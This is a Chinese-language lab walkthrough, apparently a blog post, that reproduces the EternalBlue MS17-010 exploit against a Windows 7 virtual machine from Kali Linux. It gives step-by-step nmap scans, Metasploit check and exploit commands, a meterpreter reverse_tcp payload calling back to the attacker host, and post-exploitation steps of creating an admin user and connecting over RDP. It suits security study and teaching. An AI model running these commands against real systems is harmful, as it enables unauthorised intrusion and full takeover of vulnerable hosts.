永恒之蓝ms17_010复现笔记详解

简单的讲解一下永恒之蓝的复现过程.在这个漏洞中利用的是445端口来进行攻击渗透的。

本次实验的环境:

攻击机为kali: 192.168.233.131

目标主机为windows 7 旗舰版:处于nat网络下的虚拟机 192.168.233.144

为了更方便的实现复现,关闭目标主机的防火墙,之后开启目标主机就没他什么事了

第一步老样子,探测同一局域网的存活主机:

nmap -sP 192.168.233.1/24

或者使用:

arp-scan -l

 

下一步就是用nmap进行端口探测:

nmap -sT -A -p0 192.168.233.144

 

这里我们看到有445以及3389端口可以进行利用,咱们这次主要是利用445端口来获取目标主机的meterpreter权限以及cmd权限

开始利用kali进行模块搜索:

search ms17_010

 

咱们这里主要就是用这两个来进行攻击的,一个是辅助模块用来检查远程主机是否含有这个漏洞的另一个是攻击模块了,可以直接拿到cm权限。

 

先利用辅助模块来验证一下是否存在着这个漏洞吧:

use auxiliary/scanner/smb/smb_ms17_010

show options

sset RHOSTS 192.168.233.144

run 

 

发现是存在漏洞的:

 

利用攻击模块进行攻击:

use exploit/windows/smb/ms17_010_eternalblue

show options 

set RHOSTS 192.168.233.144

exploit

这样可以直接拿到cmd权限,但是呢我现在想拿到meterpreter的shell应该怎么做呢?

有两种方法第一种比较麻烦,也不普遍:那就是用msfvenom 生成一个exe后门程序上传到目标主机上并在目标主机上运行,(这似乎有点难度)

所以我就用简单点的方法,就是选择攻击模块的时候,下一步选择一个meterpreter/reverse_tcp的一个payload

use exploit/windows/smb/ms17_010_eternalblue

 

show options 

 

set RHOSTS 192.168.233.144

 

set payload windows/x64/meterpreter/reverse_tcp

 

show options 

 

set LHOST 192.168.233.131

 

exploit

 

完成已经获取meterpreter

输入命令shell即可进入cmd权限,这是就可以直接创建管理员用户用kali来连接远程主机

rdesktop 192.168.233.144:3389

即可操作目标主机了

 

 

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leng_tian

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值